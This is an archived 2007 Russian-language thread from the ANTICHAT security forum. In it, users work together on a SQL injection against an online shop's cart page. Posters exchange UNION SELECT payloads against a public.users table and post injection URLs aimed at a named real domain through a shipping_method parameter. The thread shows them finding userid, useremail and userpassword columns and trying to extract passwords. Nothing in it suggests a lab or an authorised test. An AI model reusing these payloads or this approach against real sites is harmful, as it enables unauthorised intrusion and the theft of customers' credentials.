ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

04.09.2007, 17:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
Действительно постгрес, но переменные хорошо фильтруются, есть баг в корзинке, но вывод преобразуется к числу с плавающей точкой...
|
|
|

04.09.2007, 17:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
может попробовать двойной юнион ?
-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users
+union+select+null,0 as cur.jrk,null,null,null,null,nul l,null
тогда в конце припишется " ORDER BY cur.jrk ASC "
имхо может прокатить
|
|
|

04.09.2007, 17:43
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
Сообщение от geezer.code
может попробовать двойной юнион ?
-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users
+union+select+null,0 as cur.jrk,null,null,null,null,nul l,null
тогда в конце припишется " ORDER BY cur.jrk ASC "
имхо может прокатить
точка ему тут не нравится cur.jrk, и так %2E не катит
ERROR: syntax error at or near "." at character 145
|
|
|

04.09.2007, 17:47
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
прои такой строчке:
http://хххххх.уу/index.da?ln=est&do=my_cart&shipping_method=-10+union+select+null,userid+from+public.users+wher e+userid=2031
выводит 2031, но других полей кроме userid просто не могу подобрать, выводит : column XXx is not exist
pass, passwrd, pswrd, psswrd, password, drowssap i t.d. нот экзист и всё тут =(
|
|
|

04.09.2007, 17:54
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
В том, то и прикол что вывод идёт числового поля... И кроме как числовые данные ты с Union туда засунуть не сможешь...
|
|
|

04.09.2007, 17:57
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
|
|
|

05.09.2007, 00:15
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
так, удалось выявить существование таких полей в таблице users:
1 userid
2 useremail
3 userpassword
однако тайп мисматч не даёт туда ворваться, числовые параметры требует =(
|
|
|

05.09.2007, 00:32
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
странно такое написание система допускает:
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userid+from+public.users+wher e+userid=2036
возвращает значение 2036
а такое нет
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userpassword+from+public.user s+where+userpassword=987654321
Почему?
|
|
|

05.09.2007, 10:13
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме: 29295
Репутация:
4
|
|
всё, проблема решена всем спасибо. Можно закрывать тему
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|